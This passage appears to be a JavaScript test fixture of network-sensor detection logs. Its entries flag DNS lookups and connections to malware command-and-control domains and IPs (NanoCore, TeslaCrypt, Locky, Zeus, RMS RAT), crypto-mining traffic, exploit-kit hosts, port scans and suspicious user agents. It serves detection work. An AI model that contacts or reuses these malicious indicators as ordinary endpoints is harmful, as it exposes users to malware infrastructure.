    '"2021-01-11 01:00:00.838326" r2d2 2.200.110.233 55346 2.200.107.168 53 UDP DNS jafuq.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:00:00.840069" r2d2 2.200.107.146 63786 205.251.197.29 53 UDP DNS jafuq.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:00:00.837460" r2d2 10.43.193.193 53892 10.1.194.234 53 UDP DNS jafuq.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:00:02.168396" r2d2 10.43.192.103 55729 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:00:08.199203" r2d2 10.43.192.103 55730 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:00:18.181189" r2d2 10.3.160.42 14683 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:00:18.283317" r2d2 10.3.160.42 14683 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:00:18.379933" r2d2 10.3.160.42 14683 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:00:18.579614" r2d2 10.3.160.42 14683 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:00:18.880412" r2d2 10.3.160.42 14683 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:00:19.279773" r2d2 10.3.160.42 14683 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:00:20.275545" r2d2 10.43.192.103 55732 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:00:20.379599" r2d2 10.3.160.42 14683 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:00:24.466225" r2d2 2.200.109.177 59694 108.163.130.184 5655 TCP IPORT 108.163.130.184:5655 "rmsrat (malware)" (static)\n' +
    '"2021-01-11 01:00:27.510193" r2d2 2.200.110.232 63954 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:00:27.514217" r2d2 2.200.107.146 36227 204.16.253.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:00:27.540370" r2d2 2.200.110.233 64307 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:00:38.369766" r2d2 10.43.192.103 55735 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:00:50.456098" r2d2 10.43.192.103 55737 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:00:56.502738" r2d2 10.43.192.103 55738 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:00:53.810640" r2d2 178.17.174.14 51084 2.200.109.24 80 TCP UA "HELLO (Mozilla/5.0 \\(Windows NT 6.1; Win64; x64\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Chrome/60.0.3112.113 Safari/537.36HH=18Runtime=fobkjmjepodfhggkgoeackdaihhmeliaALICDN/ DOL/HELLO_GWF_s_6273_r2x9ak474125_531)" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:00:57.409112" r2d2 178.17.174.14 51604 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET CLR 1.1.4322; FunWebProducts; Zune 4.7; .NET4.0E; InfoPath.3\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:01:08.588105" r2d2 10.43.192.103 55740 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:01:20.656029" r2d2 10.43.192.103 55743 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:01:32.739846" r2d2 10.43.192.103 55745 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:01:37.545481" r2d2 2.200.110.232 64104 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:01:37.557464" r2d2 2.200.107.146 11736 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:01:37.591886" r2d2 2.200.110.233 63692 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:01:38.765746" r2d2 10.43.192.103 55746 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:01:43.382373" r2d2 2.200.110.232 49160 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:01:50.842333" r2d2 10.43.192.103 55748 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:01:49.123207" r2d2 172.98.64.135 37076 2.200.107.189 80 TCP UA B4ckdoor(-owned-you) "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:05:34.266133" r2d2 10.43.192.103 55807 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:05:32.215392" r2d2 10.1.19.42 59081 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:05:43.401841" r2d2 2.200.110.232 49209 2.200.107.169 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 01:05:46.978244" r2d2 178.17.174.14 49018 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; BTRS29313; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; BRI/1; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; .NET4.0E\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:05:52.367097" r2d2 10.43.192.103 55811 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:05:46.978256" r2d2 178.17.174.14 49018 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; BTRS29313; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; BRI/1; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; .NET4.0E\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:05:46.978255" r2d2 178.17.174.14 49018 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; FunWebProducts; BTRS29313; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; BRI/1; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; .NET4.0E\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:05:58.401343" r2d2 10.43.192.103 55861 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:05:59.607854" r2d2 2.200.110.232 64518 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:05:59.609576" r2d2 2.200.107.146 2829 194.62.182.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:05:59.620049" r2d2 2.200.110.232 65021 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:05:59.625332" r2d2 2.200.107.146 11395 52.58.214.33 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:05:55.757118" r2d2 178.17.174.14 49482 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/5.0 \\(compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; MANM\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:06:10.485572" r2d2 10.43.192.103 55867 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:06:16.816272" r2d2 2.200.110.233 63588 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:06:17.640930" r2d2 2.200.110.232 64991 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:06:17.642497" r2d2 2.200.107.146 25936 194.62.183.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:06:17.667822" r2d2 2.200.110.233 64664 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:06:20.701535" r2d2 10.3.160.42 15526 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:06:20.800551" r2d2 10.3.160.42 15526 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:06:20.899079" r2d2 10.3.160.42 15526 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:06:21.099148" r2d2 10.3.160.42 15526 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:06:21.399125" r2d2 10.3.160.42 15526 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:06:21.839756" r2d2 2.200.107.146 1074 190.9.129.56 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 01:06:21.837760" r2d2 2.200.110.233 64783 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 01:06:21.892665" r2d2 2.200.110.233 64898 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 01:06:21.893325" r2d2 2.200.107.146 46162 193.232.128.6 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 01:06:22.024032" r2d2 2.200.110.233 49247 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:06:22.299362" r2d2 10.3.160.42 15526 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 01:06:22.551145" r2d2 10.43.192.103 55869 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:06:28.586244" r2d2 10.43.192.103 55870 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:06:34.618110" r2d2 10.43.192.103 55872 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:06:43.398583" r2d2 2.200.110.232 65134 2.200.107.169 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:06:41.815658" r2d2 178.17.174.14 52014 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET4.0C; BRI/1; .NET CLR 2.0.50727\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:06:47.739871" r2d2 2.200.107.228 57849 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:06:52.335825" r2d2 2.200.110.233 64898 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 01:06:52.338337" r2d2 2.200.107.146 21581 54.226.255.149 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 01:06:52.736445" r2d2 10.43.192.103 55875 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:06:47.594365" r2d2 2.200.107.228 57849 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:06:47.300750" r2d2 2.200.107.228 57849 93.184.221.240 80 TCP UA "Windows-Update-Agent/10.0.10011.16384 Client-Protocol/1.40" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:07:04.809748" r2d2 10.43.192.103 55878 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:07:07.989406" r2d2 178.17.174.14 53700 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; BTRS124338; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FunWebProducts; AskTbORJ/5.15.15.36191; yie8\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:07:07.989401" r2d2 178.17.174.14 53700 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; BTRS124338; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FunWebProducts; AskTbORJ/5.15.15.36191; yie8\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:07:16.887061" r2d2 10.43.192.103 55880 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:07:14.029549" r2d2 10.1.19.42 59082 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:07:07.989409" r2d2 178.17.174.14 53700 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; BTRS124338; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FunWebProducts; AskTbORJ/5.15.15.36191; yie8\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:07:27.035579" r2d2 2.200.110.233 63389 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:07:27.036971" r2d2 2.200.107.146 20928 173.201.68.21 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 01:07:27.219662" r2d2 2.200.110.233 64761 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 01:07:27.221439" r2d2 2.200.107.146 1029 193.232.142.17 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 01:07:27.674460" r2d2 2.200.107.146 35071 204.16.253.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:07:27.672944" r2d2 2.200.110.232 65531 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:07:27.702786" r2d2 2.200.110.233 49206 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:07:31.763018" r2d2 2.200.110.232 63775 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:07:31.764764" r2d2 2.200.107.146 50249 192.55.83.30 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:07:31.802503" r2d2 2.200.110.233 63544 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:07:34.990750" r2d2 10.43.192.103 55888 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:07:43.382308" r2d2 2.200.110.232 65043 2.200.107.169 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:07:43.384293" r2d2 2.200.107.146 22287 45.54.64.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 01:07:46.456908" r2d2 2.200.110.233 64782 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 01:07:53.079609" r2d2 10.43.192.103 55904 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:08:01.180713" r2d2 2.200.110.232 64961 2.200.107.169 53 UDP DNS jafuq.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:08:01.204007" r2d2 2.200.110.233 63533 2.200.107.168 53 UDP DNS jafuq.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 01:08:11.189443" r2d2 10.43.192.103 55907 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:08:23.257410" r2d2 10.43.192.103 55909 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:08:29.291209" r2d2 10.43.192.103 55910 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:08:31.000160" r2d2 2.200.108.59 21919,21920,21923,21924,21925,21926,21927,21928,21930,21935,21936,21937,21938,21940,21941,21944,21945,21946,21947,21949,21951,32876,33956,34954,35206,35380,35848,37220,37802,38723,38725,38726,38794,40968,41694,41908,43094,43522,45004,45005,45006,45906,46064,46202,47320,48050,48210,49230,49616,49970,50962,51152,51390,51992,52332,52602,52740,53410,54402,54452,54860,55500,56374,56500,57516,58346,58676,59810,60424,60816 77.53.81.105 21,5010,5192,5882,7247,7395,8976,9316,10954,14541,15290,18866,21913,24245,25062,25518,26462,29633,31301,31397,35435,35681,35880,36147,37986,39025,43838,44274,45850,46935,48777,49203,49869,53582,53965,54593,56235,56469,57521,58637,59624,60893,64027,65361 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:08:31.000537" r2d2 2.200.108.59 21921,21922,21927,21929,21930,21932,21933,21937,21939,21943,21945,21946,21948,21951,21954,21956,21959,21960,21961,21962,21964,21965,21966,32900,33050,33124,33168,33188,33486,33650,33912,34406,34644,34722,35380,36254,36562,36762,37430,38702,38724,38726,38727,38728,38731,38733,39742,39954,39962,40524,40968,40970,41078,41358,42010,42348,42628,42994,43252,43262,43366,43802,43912,44004,44946,44974,45003,45005,45006,45008,45009,45010,45011,45128,45568,45866,45896,45906,46144,46202,46216,46352,46696,46712,46906,46912,47196,47448,48050,48364,48574,48650,48666,49266,50448,50902,51010,51100,51148,51580,51686,53410,53514,53594,53600,53622,54264,54338,54452,54700,54860,55184,55258,56314,56532,56800,57000,57286,57352,57406,57428,57510,58106,58346,58392,58458,58676,59122,59182,59222,59446,59574,59918,60002,60816,60820,60924 77.53.81.105 21,5249,5251,5452,6831,6927,7312,7818,8691,8765,8951,9316,9532,10631,11596,12070,12073,13785,13903,16451,17109,17765,17812,17903,18032,18866,19806,20063,20094,21589,22621,23856,24173,24245,24675,25409,25736,27007,27368,27498,29595,31355,31591,32218,32610,32787,32843,33010,33276,33748,34258,34386,34838,35289,35681,35824,36147,36178,37562,37986,39773,40108,40178,40727,41081,42457,43132,43312,43440,44274,44322,44854,45155,46726,48553,48698,49869,50116,50144,50267,50454,51980,52493,56320,56469,57968,58176,58392,59004,59568,60231,61186,61632,62440,63326,63471,63712,63780,63962,64027,64606,65470 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:08:27.987736" r2d2 178.17.174.14 57698 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; BRI/1; .NET4.0C; FunWebProducts\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 01:08:31.000475" r2d2 2.200.108.59 21919,21921,21922,21924,21929,21931,21932,21934,21935,21938,21940,21942,21943,21948,21950,21953,21954,21957,21958,21959,21961,21962,21969,21970,21976,21984,21986,21988,21993,21994,21995,21996,21999,22007,33036,33124,33174,33188,33272,33690,33780,33902,33912,33954,34098,34406,34504,34536,34722,34818,34954,34996,35012,35206,35418,35720,35860,35872,36498,36562,36762,37054,37074,37220,37354,37430,37458,37760,37802,37984,38062,38210,38702,38723,38725,38728,38730,38731,38734,38739,38794,39064,39560,40070,40220,40418,40524,40534,40570,40726,40886,40904,41326,41534,41692,41786,41908,42240,42348,42672,42696,42918,43144,43252,43802,43912,44078,44192,44230,44310,44874,44946,44974,45003,45008,45011,45013,45014,45016,45017,45018,45019,45020,45021,45174,45236,45340,45568,45648,45852,45866,45948,46064,46480,46594,46712,46906,46912,47196,47320,47696,47874,47942,48020,48024,48050,48210,48468,48560,48574,48616,49084,49230,49278,49392,49616,49646,49970,51148,51156,51390,51440,51686,51992,52164,52198,52254,52276,52332,52496,52644,53514,53980,54068,54402,54420,54700,54740,54878,55258,55304,55324,55428,55446,56234,56374,56532,56814,57000,57198,57286,57352,57452,57516,57652,57966,58106,58280,58840,59122,59574,59734,59810,60000,60424,60604,60746,60844,60996 77.53.81.105 21,5010,5192,5249,5784,5882,6206,6301,6867,6879,7247,7312,7395,7542,8691,8818,8859,8976,9680,9967,10536,10619,10908,10954,11357,11881,12070,12073,13518,13598,13903,14286,14541,14624,14637,14874,15290,15487,15978,16174,16248,16404,16451,17109,17248,18692,18717,19556,20063,20225,20386,20440,21170,21250,21527,22621,23872,24012,24089,24173,24319,24675,25062,26462,27007,27562,27610,29702,29704,29791,30007,30038,30291,30633,31355,31397,32218,32326,32558,32610,32807,33525,33748,34386,35262,35289,35435,36183,36850,36996,37242,39025,39317,40108,40178,40539,40727,41081,41194,41266,41437,41556,42153,42410,43132,43279,43350,43440,43487,43838,43887,44006,44104,45060,45850,46231,46460,46671,46935,47971,48553,49197,50267,50454,50707,50888,50957,51543,52493,52594,52800,53965,54605,54724,55598,55712,56235,56320,56773,57183,57354,57861,57968,58392,58637,59670,60112,60231,60254,60903,61082,61105,61969,62416,63428,63780,63962,64606,64818,65295,65361 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:08:37.705515" r2d2 2.200.110.232 65067 2.200.107.169 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:08:37.706980" r2d2 2.200.107.146 23229 194.62.182.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:08:37.742838" r2d2 2.200.110.233 65390 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 01:08:41.355834" r2d2 10.43.192.103 55912 213.252.245.197 454 TCP IPORT 213.252.245.197:454 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 01:08:41.858296" r2d2 2.200.110.233 63693 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 01:08:41.859783" r2d2 2.200.107.146 58378 45.175.22.88 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 01:08:33.000063" r2d2 2.200.108.59 21952,21953,21955,21956,21963,21964,21967,21969,21970,21971,21972,21975,21977,21978,21980,21981,21982,21983,21985,21986,21987,21991,21997,21998,22000,22001,22002,22004,22008,22009,32774,33050,33174,33486,33650,33772,33780,33782,33844,33902,33954,33966,34044,34098,34172,34202,34210,34644,34698,34748,34908,34954,35208,35216,35414,35462,35482,35536,35586,35696,35840,35872,36040,36168,36218,36224,36228,36242,36266,36700,37160,37184,37300,37428,37450,37458,37566,37604,37760,37884,37984,38174,38729,38732,38733,38736,38738,38740,38788,39064,39320,39654,39962,40318,40436,40532,40534,40726,40792,40824,40834,40970,41364,41524,41534,41604,41786,41862,42002,42126,42298,42644,42672,42902,42948,42956,43178,43244,43246,43580,43646,43706,44004,44034,44192,44310,44320,44872,45007,45014,45021,45022,45108,45362,45714,45852,46216,46296,46432,46696,46772,46944,47038,47058,47068,47114,47166,47294,47448,47618,48034,48310,48340,48670,48714,48790,48840,48894,48938,48946,49010,49278,49392,49422,49646,49708,49786,50094,50096,50172,50248,50470,50574,51010,51050,51100,51104,51146,51156,51160,51222,51454,51580,51724,51846,51866,51974,52090,52164,52174,52234,52312,52380,52488,52496,52552,52656,52894,52924,52964,53002,53038,53232,53458,53522,53600,53622,53964,54068,54306,54444,54606,54718,54726,54740,54834,55254,55446,55584,55704,56314,56460,56492,56580,56794,56852,57406,57538,57582,57728,57754,57862,57872,57906,57966,57978,58026,58218,58404,58426,58458,58840,59446,59562,59568,59734,60000,60002,60132,60186,60746 77.53.81.105 21,5452,5485,5610,5715,5784,5952,6029,6546,6816,6927,6989,7095,7219,7818,7848,8859,8931,9532,9683,10118,10292,10406,10631,10822,10893,11356,11357,11533,11585,12191,12589,12694,12971,13598,13676,13679,13830,14459,14548,14624,14734,14874,15278,15487,15918,16261,16296,16901,17018,17765,17992,18161,18242,18283,18301,18951,19456,19624,20440,20653,20664,20818,21527,21589,21609,21819,22005,22008,22075,22285,22368,22431,22482,22978,22983,23315,23690,24012,24060,24330,24519,24646,25076,26647,26722,26910,27181,27368,27475,27498,27610,28302,29197,29392,29595,29665,29728,29791,30007,30010,30038,30089,30291,30398,30531,30888,31415,31456,31483,31591,31878,32586,32676,32787,33033,33444,33446,34838,35262,35297,35684,35930,36183,36322,36568,36740,36850,37180,37242,37520,37562,38279,38482,38630,38949,39040,39394,39513,39659,39819,39980,40399,40539,40765,40966,41815,42153,42562,43272,43487,43722,43940,44006,44453,44486,45022,45060,45606,45723,45896,46231,46426,46686,48801,49240,50116,50237,50241,50554,50787,50888,50890,50951,51306,52282,52624,53722,54724,55133,55288,55457,55524,55598,58147,58356,59004,59039,59477,59568,59788,60112,60498,60812,60903,61186,61627,61782,61969,62131,62920,63058,63151,63381,63524,63818,64065,64426,64606,64818,65253,65470 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 01:08:35.000482" r2d2 2.200.108.59 21967,21968,21972,21973,21974,21975,21977,21978,21979,21980,21983,21985,21988,21989,21990,21991,21992,21993,21994,21996,21999,22001,22002,22003,22004,22005,22006,22007,22009,33046,33252,33272,33604,33778,33782,34006,34112,34144,34210,34244,34476,34536,34698,34748,34996,35012,35162,35332,35414,35502,35586,35670,35720,35738,35744,35840,35862,36040,36066,36068,36168,36228,36242,36266,36498,36632,36772,37300,37756,38244,38734,38735,38736,38737,38739,38788,38896,39560,39942,40042,40112,40278,40318,40390,40416,40418,40436,40532,40824,40886,40944,40984,41400,41862,42240,42298,42644,42918,42948,42956,43014,43080,43096,43144,43246,43542,43580,43646,43706,43730,44078,44320,44690,44718,44816,44874,44930,45012,45013,45015,45016,45019,45022,45174,45214,45282,45340,45648,45814,45936,45948,45966,46668,46772,46850,47102,47294,47608,47874,47930,47978,48034,48192,48248,48306,48488,48560,48636,48670,48690,48694,48790,48920,49010,49084,49462,49484,49708,50096,50202,50234,50370,50392,50452,50528,50630,51132,51146,51210,51310,51422,51428,51440,51454,51652,51724,51974,52174,52234,52240,52254,52276,52312,52380,52470,52472,52560,52644,52924,52952,52964,53038,53374,53664,54306,54362,54542,55248,55276,55304,55396,55428,55584,55680,55704,55800,55802,55844,56050,56580,56612,56814,56858,57054,57068,57452,57472,57538,57652,57692,57728,57866,57966,58360,58368,58554,58754,58786,59000,59074,59568,59874,60186,60656,60844,60928,60996 77.53.81.105 